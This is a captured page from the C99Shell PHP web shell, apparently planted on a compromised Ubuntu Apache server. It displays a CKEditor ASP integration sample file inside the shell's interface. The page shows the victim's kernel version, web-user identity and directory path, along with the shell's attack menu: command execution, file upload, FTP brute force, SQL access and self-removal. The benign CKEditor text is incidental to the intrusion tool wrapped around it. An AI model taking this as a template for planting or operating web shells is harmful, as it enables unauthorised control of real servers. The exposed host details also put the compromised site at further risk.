!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.4.18 (Ubuntu). PHP/7.0.33-0ubuntu0.16.04.16 

uname -a: Linux digifus 3.13.0-57-generic #95-Ubuntu SMP Fri Jun 19 09:28:15 UTC 2015 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/antonella/assets/grocery_crud/texteditor/ckeditor/_samples/asp/   drwxr-xr-x
Free 9.58 GB of 29.4 GB (32.57%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.html (4.11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
ASP integration Samples List — CKEditor

CKEditor Samples List for ASP — CKEditor Sample

Overview

The ckeditor.asp file provides a wrapper to ease the work of creating CKEditor instances from classic Asp.

To use it, you must first include it into your page: <!-- #INCLUDE file="../../ckeditor.asp" --> Of course, you should adjust the path to make it point to the correct location, and maybe use a full path (with virtual="" instead of file="")

After that script is included, you can use it in different ways, based on the following pattern:

  1. Create an instance of the CKEditor class:
    dim editor
    set editor = New CKEditor
  2. Set the path to the folder where CKEditor has been installed, by default it will use /ckeditor/
    editor.basePath = "../../"
  3. Now use one of the three main methods to create the CKEditor instances:
    • Replace textarea with id (or name) "editor1".
      editor.replaceInstance "editor1"
    • Replace all textareas with CKEditor.
      editor.replaceAll empty
    • Create a textarea element and attach CKEditor to it.
      editor.editor "editor1", initialValue

Before step 3 you can use a number of methods and properties to adjust the behavior of this class and the CKEditor instances that will be created:

  • returnOutput : if set to true, the functions won't dump the code with response.write, but instead they will return it so you can do anything you want
  • basePath: location of the CKEditor scripts
  • initialized: if you set it to true, it means that you have already included the CKEditor.js file into the page and it doesn't have to be generated again.
  • textareaAttributes: You can set here a Dictionary object with the attributes that you want to output in the call to the "editor" method.
  • config: Allows to set config values for all the instances from now on.
  • instanceConfig: Allows to set config values just for the next instance.
  • addEventHandler: Adds an event handler for all the instances from now on.
  • addInstanceEventHandler: Adds an event handler just for the next instance.
  • addGlobalEventHandler: Adds an event handler for the global CKEDITOR object.
  • clearEventHandlers: Removes one or all the event handlers from all the instances from now on.
  • clearInstanceEventHandlers: Removes one or all the event handlers from the next instance.
  • clearGlobalEventHandlers: Removes one or all the event handlers from the global CKEDITOR object.

Basic Samples

Advanced Samples


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0045 ]--